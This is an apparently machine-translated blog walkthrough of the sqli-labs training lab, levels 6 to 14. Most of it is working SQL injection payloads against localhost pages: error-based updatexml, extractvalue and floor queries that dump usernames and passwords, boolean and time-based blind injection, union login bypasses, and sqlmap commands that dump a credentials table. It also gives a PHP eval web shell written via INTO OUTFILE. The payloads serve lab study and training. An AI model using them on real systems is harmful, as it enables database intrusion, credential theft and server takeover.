当前位置:网站首页>Sqli-labs customs clearance (less6-less14)
Sqli-labs customs clearance (less6-less14)
2022-07-02 06:54:00 【Xu Jirong】
sqlmap Guessing GET Request database
Measure the closure according to the steps ,
localhost/sqli/Less-6/?id=1" // Report errors , And expose the second half of the query statement localhost/sqli/Less-6/?id=1"
// Return to the correct page
// Null value
The measured closure is "( Double quotes ) Error reporting type of GET Type injection
Like the fifth level , Let's print the result directly
localhost/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)),0)-- - SELECT * FROM users WHERE id="1" and updatexml(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)),0)-- -" LIMIT 0,1
localhost/sqli/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)))-- - SELECT * FROM users WHERE id="1" and extractvalue(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)))-- -" LIMIT 0,1
http://localhost/sqli/Less-6/?id=1" and (select 1 from (select count(*) ,concat((select CONCAT_WS(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -
SELECT * FROM users WHERE id="1" and (select 1 from (select count(*) ,concat((select CONCAT_WS(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -"LIMIT 0,1
to glance at PHP Source code
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
')) closed get Type error type injection
Just like the previous two levels , Just show me updatexml()
http://localhost/sqli/Less-7/?id=1')) and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0)-- -
SELECT * FROM users WHERE id=(('1')) and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0)-- -')) LIMIT 0,1
But we found that the title is GET - Dump into outfile -String
sql File export vulnerability , It involves MySQL A function of
Statement to simply export data to a text file .
This can be linked to the server
This comparison
But if you export the file, you will report an error
You have an error in your SQL syntaxThe MySQL server is running with the --secure-file-priv option so it cannot execute this statement
This error occurs because the path to write out the file is not specified for the database, or there is a problem with the path .
have access to
show variables like '%secure%';
View the storage path of data , If secure_file_priv yes null It proved in my.ini The write path is not configured in the file . Go to at this time mysql.ini Of documents [mysqld] Add... Under the code secure_file_priv=D:/OUTFILE, Just add a specified path to export the file , So this thing should be difficult to use
If we can, we can pass a sentence about Trojan horse as follows
')) union select "<?php @eval($_POST['sql']);?>" into outfile ' route '
I won't write here , Don't want to write
http://localhost/sqli/Less-8/?id=1' // empty http://localhost/sqli/Less-8/?id=1 and 1=1 // Valuable http://localhost/sqli/Less-8/?id=1 and 1=2 // Valuable http://localhost/sqli/Less-8/?id=1' and '1'='1 // Valuable http://localhost/sqli/Less-8/?id=1' and '1'='2 // empty http://localhost/sqli/Less-8/?id=1' order by 3 -- -
// Valuable
Should be ’( Single quotation marks ) Closed Boolean blind note
We can guess the string in the following ways
as follows :
localhost/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))>115 -- - SELECT * FROM users WHERE id='1' and ascii(substr(database(),1,1))>115 -- -' LIMIT 0,1
localhost/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))=115 -- - SELECT * FROM users WHERE id='1' and ascii(substr(database(),1,1))=115 -- -' LIMIT 0,1
It is a function of intercepting string ,substr(database(),1,1) It means to intercept the database name , Intercept a character from the first character , We knew before that the database is ‘security’, So the intercepted character is ‘s’
Is to convert characters into ASCII code ,‘s’ Corresponding ASCII Code is 115
So the above operation guessed the characters twice , Judge whether the first character of the database name >115, Not greater than, so the page returns empty , The second guess found that it was equal to 115, You can know that the first character in the database is ’s’.
Of course, this is the premise that we know , If you don't know, you need to use a little dichotomy to guess , Very slow , So generally, this kind of injection requires tools to guess .
sqlmap Guessing GET Request database
We use sqlmap Guess it ,sqlmap How to use it? Search by yourself , I can't introduce every order one by one , I can only say what I need
sqlmap -u "" --dbs
Directly expose the database
sqlmap It also lists the injection types and the used payload
//logging the connection parameters to a file for analysis.
PHP There is a record file written inside , We ran directly into more than 100 kb Go in , So use sqlmap It's easy to insert a lot of dirty data into someone's website database
sqlmap -u "" -D security -tables
Burst all tables ,-D Used to specify the database , Check your usage , It's simple
sqlmap -u "" -D security -T users --columns
Expose all fields ,-T Used to specify the table
sqlmap -u "" -D security -T users -C "username,password" --dump
Explode all field values , -C Used to specify fields
sqlmap After running these pieces of data, so much data has been inserted , So don't mess around
Let's take a look at the source code
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
In fact, it means
This one is gone
The title tells us that it is time blind
GET-Blind-Time based single Quotes
Let's take a look at the source code
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
We can see whether it is right or not , The page shows "You are in …", It's just that we can't see it on the surface , But it does not represent. SQL The injection statement is not executed , How to see if there is injection , We can do it in payload Riga section sleep() sentence
grammar :
N Is the value , The unit is seconds , Add this value , The query statement will wait N Seconds to perform
This sleep It also depends on how many lines there are in the query statement , Because it is treated as a field
Every time a row of data is generated, it will be executed , So the top is 3 A second more
Suppose two rows of data are 6 More than seconds , So we input many times payload When you find that the results are the same, you can add one sleep() Function to see the page response time , To infer whether there is time blindness
http://localhost/sqli/Less-9/?id=1' and sleep(3)-- -
SELECT * FROM users WHERE id='1' and sleep(3)-- -' LIMIT 0,1
Hand notes can be written like this payload
1' and if((substr(database(),1,1))='s',sleep(5),null)
We can see the packet response time in the developer tool ,4 A second more , It indicates that there is indeed an injection point
Not echo error , Blind injection and manual injection are not easy , The judgment method is the same as blind injection , It's just a time requirement , Let's take... Directly sqlmap Run the password
sqlmap -u "" -D security -T users -C "username,password" --dump
Take a look at the title
GET - Blind-Time based - double quots
Double quotation mark closed time blind note , We won't try one by one, just like the echo test method before , Is to judge with time , It's a little time-consuming , We just sqlmap Just run
sqlmap Say no injection point ...
title POST - Error Based - Single quotes -String
post Type single quotation mark closed character echo injection , When we look at the page, we can also see that it is post Type of Injection
If we give a single quotation mark, we will report an error
We can guess the second half of the query statement username=‘’ and password=‘’ LIMIT 0,1
At this time, we can build a constant query statement
' or 1=1 -- -
Let's look at the source code
//including the Mysql connect parameters.
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
//logging the connection parameters to a file for analysis.
fwrite($fp,'User Name:'.$uname);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
payload:' union select group_concat(username),group_concat(password) from users-- -
SELECT username, password FROM users WHERE username='' union select group_concat(username),group_concat(password) from users-- -' and password='' LIMIT 0,1
title :POST -Error Based -Double quotes -String - with twist
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
Look at the source code ,") Closed post Type echo character injection , Principle follows 11 It's the same , We take the password directly
payload:") union select group_concat(username),group_concat(password) from users -- -
SELECT username, password FROM users WHERE username=("") union select group_concat(username),group_concat(password) from users -- -") and password=("") LIMIT 0,1
title :POST-Double injection - Single quotes String - with twist
payload:' // Report errors , That is the ') closed
payload:') or 1=1 -- -
// It is known that it is an error type injection , Do not echo values directly
still updatexml()、extractvalue()、floor()
payload:') and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),0) -- -
SELECT username, password FROM users WHERE username=('') and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),0) -- -') and password=('') LIMIT 0,1
title :POST - Double injection -Single quotes-String-with twist
// No echo
It should be noted that
SELECT username, password FROM users WHERE username="'" and password="" LIMIT 0,1
“”( Double quotes ) Close and (“”)( Double quotation marks brackets ) Closed inside ’( Single quotation marks ) It is also executed as a string , At this time, just give a double quotation mark , It is basically possible to determine whether double quotation marks are closed , And whether it adopts mysqli-error($con)
payload:" // Report errors , And burst the second half of the query statement """ and password="" LIMIT 0,1
It can be seen that it is an error reporting type with double quotation marks POST Type character type injection
It's the same as one , Let's give a paragraph payload
admin" and (select 1 from (select count(*) ,concat((select concat_ws(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -
SELECT username, password FROM users WHERE username="admin" and (select 1 from (select count(*) ,concat((select concat_ws(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -" and password="" LIMIT 0,1
This floor() Error reporting needs and A valid value , If the value is invalid, it will display empty , This method requires us to know a piece of information , It's not easy to use
Suppose you don't know the account number is ’admin’, There is no way to report an error
- Pytest (2) mark function
- Kali latest update Guide
- 20210306 reprint how to make TextEdit have background pictures
- Latex在VSCODE中编译中文,使用中文路径问题解决
- Sentry construction and use
- 20210306转载如何使TextEdit有背景图片
- The win10 network icon disappears, and the network icon turns gray. Open the network and set the flash back to solve the problem
- Storage space modifier in CUDA
- SQLI-LABS通关(less18-less20)
- Kotlin - verify whether the time format is yyyy MM DD hh:mm:ss
Linux MySQL 5.6.51 Community Generic 安装教程
Win10: add or delete boot items, and add user-defined boot files to boot items
CVE-2015-1635(MS15-034 )遠程代碼執行漏洞複現
How to debug wechat built-in browser applications (enterprise number, official account, subscription number)
Présence d'une panne de courant anormale; Problème de gestion de la fsck d'exécution résolu
Fe - wechat applet - Bluetooth ble development research and use
Pytest (2) mark function
Sublime text configuring PHP compilation environment
FE - weex 开发 之 使用 weex-ui 组件与配置使用
Improve user experience defensive programming
The table component specifies the concatenation parallel method
DeprecationWarning: . ix is deprecated. Please use. loc for label based indexing or. iloc for positi
Pytest (3) parameterize
Fe - weex uses a simple encapsulated data loading plug-in as the global loading method
Storage space modifier in CUDA
Blog directory of zzq -- updated on 20210601
Asynchronous data copy in CUDA
There is no way to drag the win10 desktop icon (you can select it, open it, delete it, create it, etc., but you can't drag it)
Flex Jiugongge layout
Warp matrix functions in CUDA
Function execution space specifier in CUDA
UEditor .Net版本任意文件上传漏洞复现